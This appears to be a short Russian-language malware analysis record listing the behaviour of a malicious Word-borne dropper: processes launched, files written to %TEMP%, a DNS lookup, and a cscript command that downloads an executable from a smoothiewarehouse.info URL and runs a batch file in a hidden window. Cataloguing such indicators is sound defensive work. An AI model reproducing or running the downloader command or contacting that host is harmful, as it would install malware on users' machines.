Техническая информация
- '<SYSTEM32>\cmd.exe' /c %TEMP%\fdsxasxsadd.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1372
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\fdsxasxsadd.bat
- %TEMP%\tfgbjkbkjsdas.vbs
- %TEMP%\1317678.cvr
- %TEMP%\tfgbjkbkjsdas.vbs
- DNS ASK sv######.smoothiewarehouse.info
- '<SYSTEM32>\cscript.exe' //Nologo %TEMP%\tfGBJKbkjsdas.vbs http://svrapp02.smoothiewarehouse.info/fecha/esberando.php %TEMP%\bvdsfsdg.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\fdsxasxsadd.bat (со скрытым окном)